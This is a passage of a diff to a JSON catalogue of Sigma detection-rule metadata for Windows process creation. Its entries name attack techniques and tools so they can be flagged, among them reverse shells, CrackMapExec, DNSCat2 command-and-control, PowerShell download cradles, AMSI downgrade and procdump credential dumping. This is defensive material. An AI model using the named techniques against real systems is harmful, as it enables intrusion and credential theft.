Spawned by Java" + }, + { + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_susp_16bit_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", + "value": "Start of NT Virtual DOS Machine" + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2018/11/20", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_unidentified_nov_18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", "attack.t1218.011" ] }, - "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "value": "Detection of PowerShell Execution via DLL" + "uuid": "7453575c-a747-40b9-839b-125a0aae324b", + "value": "Unidentified Attacker November 2018" + }, + { + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "meta": { + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "value": "Suspicious Driver Install by pnputil.exe" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_ultravnc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", + "value": "Use of UltraVNC Remote Access Software" + }, + { + "description": "Detects creation of a scheduled task with a GUID like name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate software naming their tasks as GUIDs" + ], + "filename": "proc_creation_win_susp_guid_task_name.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "value": "Suspicious Scheduled Task Name As GUID" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_evil_winrm.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Hackplayers/evil-winrm", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "value": "WinRM Access with Evil-WinRM" + }, + { + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_actinium_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "value": "Scheduled Task WScript VBScript" + }, + { + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "meta": { + "author": "Aaron Herman", + "creation_date": "2022/10/01", + "falsepositive": [ + "Legitimate applications installed on other partitions such as \"D:\"" + ], + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", + "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "value": "Wscript Execution from Non C Drive" + }, + { + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Utilization of this tool should not be seen in enterprise environment" + ], + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "value": "Visual Basic Command Line Compiler Usage" + }, + { + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + ], + "tags": "No established tags" + }, + "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "value": "Suspicious SysAidServer Child" + }, + { + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_non_priv_reg_or_ps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "value": "Non-privileged Usage of Reg or Powershell" + }, + { + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Rare legitimate add to registry via cli (to these locations)" + ], + "filename": "proc_creation_win_susp_reg_add.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ] + }, + "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "value": "Reg Add Suspicious Paths" + }, + { + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "value": "Obfuscated IP Via CLI" + }, + { + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" + ], + "tags": [ + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" + ] + }, + "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" + }, + { + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "meta": { + "author": "elhoim", + "creation_date": "2022/05/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "value": "Regsvr32 Spawning Explorer" + }, + { + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_high_integrity_sdclt.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", + "value": "High Integrity Sdclt Process" + }, + { + "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/08", + "falsepositive": [ + "Other powershell scripts that call nslookup.exe" + ], + "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/lukebaggett/dnscat2-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071", + "attack.t1071.004", + "attack.t1001.003", + "attack.t1041" + ] + }, + "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", + "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" + }, + { + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_creative_cloud_node_abuse.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mttaggart/status/1511804863293784064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127", + "attack.t1059.007" + ] + }, + "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "value": "Node Process Executions" + }, + { + "description": "Detects WMIC executing suspicious or recon commands", + "meta": { + "author": "Michael Haag, Florian Roth, juju4, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" + ], + "filename": "proc_creation_win_susp_wmic_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ] + }, + "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", + "value": "Suspicious WMIC Execution" + }, + { + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_change.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "value": "Suspicious Modification Of Scheduled Tasks" }, { "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", @@ -44514,6 +41559,7 @@ "logsource.product": "windows", "refs": [ "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" ], "tags": [ @@ -44523,385 +41569,642 @@ ] }, "uuid": "b3512211-c67e-4707-bedc-66efc7848863", - "value": "PowerShell Downgrade Attack" + "value": "Potential PowerShell Downgrade Attack" }, { - "description": "Detects a Powershell process that contains download commands in its command line string", + "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/01/16", + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_powershell_download.yml", + "filename": "proc_creation_win_susp_tracker_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1055.001" ] }, - "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "value": "PowerShell Download from URL" + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "DLL Injection with Tracker.exe" }, { - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "meta": { "author": "Florian Roth", - "creation_date": "2022/02/28", - "falsepositive": [ - "Software installers that pull packages from remote systems and execute them" - ], - "filename": "proc_creation_win_powershell_download_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "value": "Suspicious PowerShell Download and Execute Pattern" - }, - { - "description": "Detects suspicious FromBase64String expressions in command line arguments", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/29", - "falsepositive": [ - "Administrative script libraries" - ], - "filename": "proc_creation_win_powershell_frombase64string.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" - ], - "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" - ] - }, - "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", - "value": "FromBase64String Command Line" - }, - { - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2020/05/02", + "creation_date": "2022/03/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", - "value": "PowerShell Get-Clipboard Cmdlet Via CLI" - }, - { - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_powershell_public_folder.yml", + "filename": "proc_creation_win_crackmapexec_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" - ], - "tags": "No established tags" - }, - "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "value": "Execution of Powershell Script in Public Folder" - }, - { - "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", - "meta": { - "author": "FPT.EagleEye, wagga", - "creation_date": "2021/03/03", - "falsepositive": [ - "Administrative might use this function for checking network connectivity" - ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "value": "Powershell Reverse Shell Connection" - }, - { - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", - "meta": { - "author": "FPT.EagleEye", - "creation_date": "2021/03/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" - ] - }, - "uuid": "25676e10-2121-446e-80a4-71ff8506af47", - "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM" - }, - { - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "meta": { - "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "36210e0d-5b19-485d-a087-c096088885f0", - "value": "Suspicious PowerShell Parameter Substring" - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "meta": { - "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", - "creation_date": "2018/09/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_powershell_xor_commandline.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" - ] - }, - "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", - "value": "Suspicious XOR Encoded PowerShell Command Line" - }, - { - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "meta": { - "author": "Markus Neis, @Karneades", - "creation_date": "2018/03/06", - "falsepositive": [ - "False positives are possible, depends on organisation and processes" - ], - "filename": "proc_creation_win_powersploit_empire_schtasks.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", - "value": "Default PowerSploit and Empire Schtasks Persistence" - }, - { - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/29", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_powertool_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", - "value": "PowerTool Execution" - }, - { - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ] - }, - "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "value": "Privilege Escalation via Named Pipe Impersonation" - }, - { - "description": "Detects usage of the SysInternals Procdump utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/16", - "falsepositive": [ - "Legitimate use of procdump by a developer or administrator" - ], - "filename": "proc_creation_win_procdump.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "value": "Procdump Usage" - }, - { - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Cases in which procdump just gets copied to a different directory without any renaming" - ], - "filename": "proc_creation_win_procdump_evasion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1480785527901204481", - 